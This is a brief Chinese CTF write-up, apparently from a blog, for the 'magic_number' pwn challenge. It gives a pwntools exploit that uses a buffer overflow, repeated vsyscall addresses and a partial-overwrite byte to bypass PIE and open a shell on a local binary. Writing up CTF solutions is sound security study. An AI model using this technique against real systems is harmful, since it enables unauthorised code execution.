登录后台

页面导航

前言

题目是安恒月赛的magic_number,当时是懵逼的,赛后偶然间看到其他师傅的wp,才想起了萝卜师傅的一篇文章

PIE保护详解和常用bypass手段

magic_number

题目:pwn.rar

利用三个特殊的地址滑到下面

#coding:utf-8
from pwn import *
sh = process('./pwn')
sh.sendafter('Input :\n','a'*0x38+p64(0xffffffffff600000)*4+'\xa8')
sh.interactive()